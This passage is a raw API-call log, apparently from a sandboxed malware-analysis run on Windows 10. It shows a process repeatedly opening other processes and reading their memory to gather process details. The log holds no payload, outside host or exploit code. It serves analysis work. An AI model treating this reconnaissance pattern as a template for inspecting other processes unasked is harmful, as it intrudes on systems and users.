lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.256] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc10) returned 0x28c [0264.258] GetLastError () returned 0x0 [0264.258] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.258] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x27c018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.258] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.258] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571cd0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.258] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571888, lpBuffer=0x138c580, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.259] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.259] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.259] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x27c020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.259] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.260] malloc (_Size=0x90) returned 0xd9d190 [0264.260] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571910, lpBuffer=0xd9d190, nSize=0x8e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.260] free (_Block=0xd9d190) [0264.261] CloseHandle (hObject=0x28c) returned 1 [0264.261] _ui64tow_s (in: _Value=0x510, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1296") returned 0x0 [0264.261] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1296") returned 4 [0264.261] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.261] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.262] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x510) returned 0x28c [0264.263] GetLastError () returned 0x0 [0264.263] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.263] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3da018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.263] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.263] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521c80, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.263] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521888, lpBuffer=0x138c580, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.264] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.264] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.264] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3da020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.264] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.264] malloc (_Size=0x72) returned 0xd9d190 [0264.265] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5218f2, lpBuffer=0xd9d190, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.265] free (_Block=0xd9d190) [0264.265] CloseHandle (hObject=0x28c) returned 1 [0264.266] _ui64tow_s (in: _Value=0x754, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1876") returned 0x0 [0264.266] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1876") returned 4 [0264.266] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.266] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.270] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x28c [0264.270] GetLastError () returned 0x0 [0264.270] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.270] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x598018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.270] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.271] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x261cb0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.271] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x261888, lpBuffer=0x138c580, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.271] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.271] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.272] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x598020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.272] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x261270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.272] malloc (_Size=0x84) returned 0xd9d190 [0264.272] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x261904, lpBuffer=0xd9d190, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.273] free (_Block=0xd9d190) [0264.273] CloseHandle (hObject=0x28c) returned 1 [0264.273] _ui64tow_s (in: _Value=0x574, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1396") returned 0x0 [0264.274] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1396") returned 4 [0264.274] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.274] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.275] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x574) returned 0x28c [0264.275] GetLastError () returned 0x0 [0264.275] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.275] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x243018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.275] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.275] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1ca0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.276] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1888, lpBuffer=0x138c580, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.276] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.276] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.276] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x243020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.276] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.277] malloc (_Size=0x80) returned 0xd9d190 [0264.277] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1900, lpBuffer=0xd9d190, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.277] free (_Block=0xd9d190) [0264.278] CloseHandle (hObject=0x28c) returned 1 [0264.278] _ui64tow_s (in: _Value=0x9a8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="2472") returned 0x0 [0264.279] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="2472") returned 4 [0264.279] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.279] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a8) returned 0x28c [0264.280] GetLastError () returned 0x0 [0264.280] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.280] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d7018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.280] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.281] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.281] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1888, lpBuffer=0x138c580, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.281] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.281] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.281] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d7020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.282] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.282] malloc (_Size=0x66) returned 0xdb03b0 [0264.282] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d18e6, lpBuffer=0xdb03b0, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0264.282] free (_Block=0xdb03b0) [0264.283] CloseHandle (hObject=0x28c) returned 1 [0264.283] _ui64tow_s (in: _Value=0x320, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="800") returned 0x0 [0264.283] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="800") returned 3 [0264.283] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.283] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.284] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x320) returned 0x28c [0264.285] GetLastError () returned 0x0 [0264.285] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.285] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4bc018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.285] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.285] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x251cd0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.285] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x251888, lpBuffer=0x138c580, nSize=0x84, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.286] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.286] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.286] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4bc020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.286] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x251270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.286] malloc (_Size=0x8c) returned 0xd9d190 [0264.286] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x25190c, lpBuffer=0xd9d190, nSize=0x8a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.287] free (_Block=0xd9d190) [0264.287] CloseHandle (hObject=0x28c) returned 1 [0264.288] _ui64tow_s (in: _Value=0x360, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="864") returned 0x0 [0264.288] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="864") returned 3 [0264.288] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.288] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.308] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x360) returned 0x28c [0264.308] GetLastError () returned 0x0 [0264.309] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.309] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x49b018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.309] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.309] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7d1cc0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.310] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7d1888, lpBuffer=0x138c580, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.310] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.310] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.310] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x49b020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.310] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.311] malloc (_Size=0x88) returned 0xd9d190 [0264.311] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7d1908, lpBuffer=0xd9d190, nSize=0x86, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.311] free (_Block=0xd9d190) [0264.312] CloseHandle (hObject=0x28c) returned 1 [0264.312] _ui64tow_s (in: _Value=0xed0, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3792") returned 0x0 [0264.312] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3792") returned 4 [0264.312] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.312] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.314] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xed0) returned 0x28c [0264.314] GetLastError () returned 0x0 [0264.314] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.314] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x457018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.314] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.314] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2a1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.314] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2a1888, lpBuffer=0x138c580, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.315] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.315] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.315] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x457020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.315] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2a1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.315] malloc (_Size=0x66) returned 0xdb0420 [0264.315] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2a18e6, lpBuffer=0xdb0420, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb0420*, lpNumberOfBytesRead=0x0) returned 1 [0264.316] free (_Block=0xdb0420) [0264.316] CloseHandle (hObject=0x28c) returned 1 [0264.316] _ui64tow_s (in: _Value=0xba8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="2984") returned 0x0 [0264.317] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="2984") returned 4 [0264.317] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.317] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.318] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xba8) returned 0x28c [0264.318] GetLastError () returned 0x0 [0264.318] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.319] ReadProcessMemory (in: 